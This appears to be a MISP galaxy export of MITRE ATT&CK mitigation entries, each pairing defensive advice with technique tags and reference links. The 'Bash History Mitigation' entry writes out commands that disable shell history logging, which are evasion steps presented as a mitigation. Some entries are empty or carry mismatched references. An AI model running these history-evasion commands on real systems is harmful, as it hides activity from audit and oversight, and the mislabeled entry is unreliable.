Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Other mitigations can take place as [User Execution](https://attack.mitre.org/techniques/T1204) occurs.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Link Mitigation - T1192"

View relationships graph

Spearphishing Link Mitigation - T1192 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"

Table 4260. Table References
Links
https://attack.mitre.org/mitigations/T1192

Hidden Window Mitigation - T1143

Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Window Mitigation - T1143"

View relationships graph

Hidden Window Mitigation - T1143 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143" with estimative-language:likelihood-probability="almost-certain"

Table 4261. Table References
Links
https://attack.mitre.org/mitigations/T1143

Create Account Mitigation - T1136

Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to create privileged accounts within an environment.

Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.

Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.

The tag is: misp-galaxy:mitre-course-of-action="Create Account Mitigation - T1136"

View relationships graph

Create Account Mitigation - T1136 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

Table 4262. Table References
Links
https://attack.mitre.org/mitigations/T1136

Application Shimming Mitigation - T1138

There currently aren’t a lot of ways to mitigate application shimming. Disabling the Shim Engine isn’t recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.

Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.

The tag is: misp-galaxy:mitre-course-of-action="Application Shimming Mitigation - T1138"

View relationships graph

Application Shimming Mitigation - T1138 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138" with estimative-language:likelihood-probability="almost-certain"

Table 4263. Table References
Links
https://attack.mitre.org/mitigations/T1138

Spearphishing Attachment Mitigation - T1193

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.

Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails. To prevent the attachments from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Attachment Mitigation - T1193"

View relationships graph

Spearphishing Attachment Mitigation - T1193 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"

Table 4264. Table References
Links
https://attack.mitre.org/mitigations/T1193

Bash History Mitigation - T1139

There are multiple methods of preventing a user’s command history from being flushed to their .bash_history file, including use of the following commands: <code>set +o history</code> and <code>set -o history</code> to start logging again; <code>unset HISTFILE</code> being added to a user’s .bash_rc file; and <code>ln -s /dev/null ~/.bash_history</code> to write commands to <code>/dev/null</code>instead.

The tag is: misp-galaxy:mitre-course-of-action="Bash History Mitigation - T1139"

View relationships graph

Bash History Mitigation - T1139 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Bash History - T1139" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 4265. Table References
Links
https://attack.mitre.org/mitigations/T1139

Gatekeeper Bypass Mitigation - T1144

Other tools should be used to supplement Gatekeeper’s functionality. Additionally, system settings can prevent applications from running that haven’t been downloaded through the Apple Store which can help mitigate some of these issues.

The tag is: misp-galaxy:mitre-course-of-action="Gatekeeper Bypass Mitigation - T1144"

View relationships graph

Gatekeeper Bypass Mitigation - T1144 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144" with estimative-language:likelihood-probability="almost-certain"

Table 4266. Table References
Links
https://attack.mitre.org/mitigations/T1144

Private Keys Mitigation - T1145

Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-course-of-action="Private Keys Mitigation - T1145"

View relationships graph

Private Keys Mitigation - T1145 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 4267. Table References
Links
https://attack.mitre.org/mitigations/T1145

Hidden Users Mitigation - T1147

If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the <code>/Library/Preferences/com.apple.loginwindow</code> <code>Hide500Users</code> value will force all users to be visible.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Users Mitigation - T1147"

View relationships graph

Hidden Users Mitigation - T1147 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147" with estimative-language:likelihood-probability="almost-certain"

Table 4268. Table References
Links
https://attack.mitre.org/mitigations/T1147

SSH Hijacking Mitigation - T1184

Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations where only the legitimate owner has access to with strong passwords and are rotated frequently. Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)

The tag is: misp-galaxy:mitre-course-of-action="SSH Hijacking Mitigation - T1184"

View relationships graph

SSH Hijacking Mitigation - T1184 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"

Table 4269. Table References
Links
https://attack.mitre.org/mitigations/T1184
https://www.symantec.com/connect/articles/ssh-and-ssh-agent

LC_MAIN Hijacking Mitigation - T1149

Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.

The tag is: misp-galaxy:mitre-course-of-action="LC_MAIN Hijacking Mitigation - T1149"

View relationships graph

LC_MAIN Hijacking Mitigation - T1149 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149" with estimative-language:likelihood-probability="almost-certain"

Table 4270. Table References
Links
https://attack.mitre.org/mitigations/T1149

Startup Items Mitigation - T1165

Since StartupItems are deprecated, preventing all users from writing to the <code>/Library/StartupItems</code> directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can’t be leveraged for privilege escalation.

The tag is: misp-galaxy:mitre-course-of-action="Startup Items Mitigation - T1165"

View relationships graph

Startup Items Mitigation - T1165 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"

Table 4271. Table References
Links
https://attack.mitre.org/mitigations/T1165

Dylib Hijacking Mitigation - T1157

Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can’t write to these directories, then they can’t intercept the search path.

The tag is: misp-galaxy:mitre-course-of-action="Dylib Hijacking Mitigation - T1157"

View relationships graph

Dylib Hijacking Mitigation - T1157 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"

Table 4272. Table References
Links
https://attack.mitre.org/mitigations/T1157

Launch Agent Mitigation - T1159

Restrict user’s abilities to create Launch Agents with group policy.

The tag is: misp-galaxy:mitre-course-of-action="Launch Agent Mitigation - T1159"

View relationships graph

Launch Agent Mitigation - T1159 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159" with estimative-language:likelihood-probability="almost-certain"

Table 4273. Table References
Links
https://attack.mitre.org/mitigations/T1159

Browser Extensions Mitigation - T1176

Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.

Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)

Change settings to prevent the browser from installing extensions without sufficient permissions.

Close out all browser sessions when finished using them.

The tag is: misp-galaxy:mitre-course-of-action="Browser Extensions Mitigation - T1176"

View relationships graph

Browser Extensions Mitigation - T1176 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 4274. Table References
Links
https://attack.mitre.org/mitigations/T1176
http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/

Process Doppelgänging Mitigation - T1186

This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although Process Doppelgänging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Doppelgänging Mitigation - T1186"

View relationships graph

Process Doppelgänging Mitigation - T1186 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186" with estimative-language:likelihood-probability="almost-certain"

Table 4275. Table References
Links
https://attack.mitre.org/mitigations/T1186
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

LSASS Driver Mitigation - T1177

On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code> to <code>dword:00000001</code>. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.

On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)

Ensure safe DLL search mode is enabled <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</code> to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)

The tag is: misp-galaxy:mitre-course-of-action="LSASS Driver Mitigation - T1177"

View relationships graph

LSASS Driver Mitigation - T1177 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177" with estimative-language:likelihood-probability="almost-certain"

Table 4276. Table References
Links
https://attack.mitre.org/mitigations/T1177
https://technet.microsoft.com/library/dn408187.aspx
https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage
https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works
https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

Forced Authentication Mitigation - T1187

Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)

For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.

The tag is: misp-galaxy:mitre-course-of-action="Forced Authentication Mitigation - T1187"

View relationships graph

Forced Authentication Mitigation - T1187 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 4277. Table References
Links
https://attack.mitre.org/mitigations/T1187
https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices
https://www.us-cert.gov/ncas/alerts/TA17-293A

BITS Jobs Mitigation - T1197

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, disabling all BITS functionality will likely have unintended side effects, such as preventing legitimate software patching and updating. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: Mondok Windows PiggyBack BITS May 2007)

Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.

Consider limiting access to the BITS interface to specific users or groups. (Citation: Symantec BITS May 2007)

Consider reducing the default BITS job lifetime in Group Policy or by editing the <code>JobInactivityTimeout</code> and <code>MaxDownloadTime</code> Registry values in <code> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS</code>. (Citation: Microsoft BITS)

The tag is: misp-galaxy:mitre-course-of-action="BITS Jobs Mitigation - T1197"

View relationships graph

BITS Jobs Mitigation - T1197 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 4278. Table References
Links
https://attack.mitre.org/mitigations/T1197
https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/
https://www.symantec.com/connect/blogs/malware-update-windows-update
https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

Trusted Relationship Mitigation - T1199

Network segmentation can be used to isolate infrastructure components that do not require broad network access. Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. Vet the security policies and procedures of organizations that are contracted for work that require privileged access to network resources.

The tag is: misp-galaxy:mitre-course-of-action="Trusted Relationship Mitigation - T1199"

View relationships graph

Trusted Relationship Mitigation - T1199 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

Table 4279. Table References
Links
https://attack.mitre.org/mitigations/T1199

Firmware Corruption Mitigation - T1495

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.

The tag is: misp-galaxy:mitre-course-of-action="Firmware Corruption Mitigation - T1495"

View relationships graph

Firmware Corruption Mitigation - T1495 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"

Table 4280. Table References
Links
https://attack.mitre.org/mitigations/T1495

Resource Hijacking Mitigation - T1496

The tag is: misp-galaxy:mitre-course-of-action="Resource Hijacking Mitigation - T1496"

View relationships graph

Resource Hijacking Mitigation - T1496 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 4281. Table References
Links
https://attack.mitre.org/mitigations/T1496
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Destruction Mitigation - T1488

The tag is: misp-galaxy:mitre-course-of-action="Data Destruction Mitigation - T1488"

View relationships graph

Data Destruction Mitigation - T1488 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1487" with estimative-language:likelihood-probability="almost-certain"

Table 4282. Table References
Links
https://attack.mitre.org/mitigations/T1488
https://www.ready.gov/business/implementation/IT
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Service Stop Mitigation - T1489

Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.

The tag is: misp-galaxy:mitre-course-of-action="Service Stop Mitigation - T1489"

View relationships graph

Service Stop Mitigation - T1489 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 4283. Table References
Links
https://attack.mitre.org/mitigations/T1489

Multi-factor Authentication - M1032

Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.

The tag is: misp-galaxy:mitre-course-of-action="Multi-factor Authentication - M1032"

View relationships graph

Multi-factor Authentication - M1032 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Add Office 365 Global Administrator Role - T1098.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 4284. Table References
Links
https://attack.mitre.org/mitigations/M1032

Rc.common Mitigation - T1163

Limit privileges of user accounts so only authorized users can edit the rc.common file.

The tag is: misp-galaxy:mitre-course-of-action="Rc.common Mitigation - T1163"

View relationships graph

Rc.common Mitigation - T1163 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Rc.common - T1163" with estimative-language:likelihood-probability="almost-certain"

Table 4285. Table References
Links
https://attack.mitre.org/mitigations/T1163

SSL/TLS Inspection - M1020

Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.

The tag is: misp-galaxy:mitre-course-of-action="SSL/TLS Inspection - M1020"

View relationships graph

SSL/TLS Inspection - M1020 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4286. Table References
Links
https://attack.mitre.org/mitigations/M1020

Regsvcs/Regasm Mitigation - T1121

Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Regsvcs/Regasm Mitigation - T1121"

View relationships graph

Regsvcs/Regasm Mitigation - T1121 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121" with estimative-language:likelihood-probability="almost-certain"

Table 4287. Table References
Links
https://attack.mitre.org/mitigations/T1121

Security Updates - M1001

Install security updates in response to discovered vulnerabilities.

Purchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.

Decommission devices that will no longer receive security updates.

Limit or block access to enterprise resources from devices that have not installed recent security updates.

On Android devices, access can be controlled based on each device’s security patch level. On iOS devices, access can be controlled based on the iOS version.

The tag is: misp-galaxy:mitre-course-of-action="Security Updates - M1001"

View relationships graph

Security Updates - M1001 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1408" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Trusted Execution Environment - T1399" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"

Table 4288. Table References
Links
https://attack.mitre.org/mitigations/M1001

Lock Bootloader - M1003

On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.

The tag is: misp-galaxy:mitre-course-of-action="Lock Bootloader - M1003"

View relationships graph

Lock Bootloader - M1003 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"

Table 4289. Table References
Links
https://attack.mitre.org/mitigations/M1003

Network Segmentation - M1030

Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.

The tag is: misp-galaxy:mitre-course-of-action="Network Segmentation - M1030"

View relationships graph

Network Segmentation - M1030 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
